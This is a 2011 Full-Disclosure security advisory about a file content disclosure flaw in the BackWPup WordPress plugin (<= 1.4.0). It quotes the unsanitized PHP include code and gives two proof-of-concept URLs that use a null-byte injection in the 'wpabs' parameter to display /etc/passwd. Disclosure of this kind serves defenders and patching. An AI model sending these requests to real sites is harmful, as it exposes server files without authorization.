OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
[Full-disclosure] BackWPup Wordpress plugin <= 1.4.0 File content disclosure

From: Danilo Massa (danilo_myahoo.com)
Date: Mon Feb 28 2011 - 09:41:19 CST


============================================= - Release date: Feb 28th, 2010 - Discovered by: Danilo Massa - Severity: High ============================================= I. VULNERABILITY ------------------------- BackWPup Wordpress plugin <= 1.4.0 File content disclosure II. BACKGROUND ------------------------- BackWPup 1.4.0 is a full-featured backup management solution for Wordpress. The plugin provide: - Database Backup - WordPress XML Export - Optimize Database - Check\Repair Database - File Backup - Backups in zip,tar,tar.gz,tar.bz2 format - Store backup to Folder - Store backup to FTP Server - Store backup to Amazon S3 - Store backup to RackSpaceCloud - Store backup to DropBox - Send Log/Backup by eMail   III. INTRODUCTION ------------------------- BackWPup version 1.4.0 (and may be the previous ones too) has an unfiltered parameter inside two php pages that let a remote user to access sensitive files like /etc/passwd. No authentication required. No plugin activation required. IV. DESCRIPTION ------------------------- Input passed via the "wpabs" parameter to the php pages - wp-content/plugins/backwpup/app/options-view_log-iframe.php - wp-content/plugins/backwpup/app/options-runnow-iframe.php is not sanitized before being used. Both files starts trying to include the wp-load.php file using the wpabs parameter that can be inject with a direct call to the page. options-view_log-iframe.php: <?PHP if (file_exists($_GET['wpabs'].'wp-load.php') and file_exists($_GET['logfile'])) {  require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */ ... options-runnow-iframe.php: if (file_exists($_GET['wpabs'].'wp-load.php') and is_numeric(trim($_GET['jobid']))) {  require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */ ... inserting a string terminator %00 inside the wpabs parameter is possible to specify a file name instead of a directory and let it being included in the web page. NOTE: also the V. PROOF OF CONCEPT ------------------------- Below is a harmless test that can be executed on a Unix machine that hosts wordpress with the vulnerable plugin. http://<wordpress_site>/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1 http://<wordpress_site>/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd Both of them will display the /etc/passwd file. VI. BUSINESS IMPACT ------------------------- An attacker could exploit the vulnerability to retrieve virtually any text file accessible by the wep application server user. VII. SYSTEMS AFFECTED ------------------------- Version 1.4.0 is vulnerable. Versions <1.4.0 could be vulnerable. VIII. SOLUTION ------------------------- Upgrade to a patched release or as quick workaround enclose any $_GET['wpabs'] in a trim call like this: if (file_exists(trim($_GET['wpabs']).'wp-load.php') and file_exists($_GET['logfile'])) { IX. REFERENCES ------------------------- http://wordpress.org/extend/plugins/backwpup/ http://danielhuesken.de/portfolio/backwpup/ X. CREDITS ------------------------- The vulnerability has been discovered by Danilo Massa danilo(under_score)m(at)yahoo(dot)com XI. VULNERABILITY HISTORY ------------------------- January 28th, 2011: Vulnerability identification January 30th, 2011: Vendor notification January 30th, 2011: Vendor release an updated version (1.4.1) February 28th, 2011: Vulnerability disclosure XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this  information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/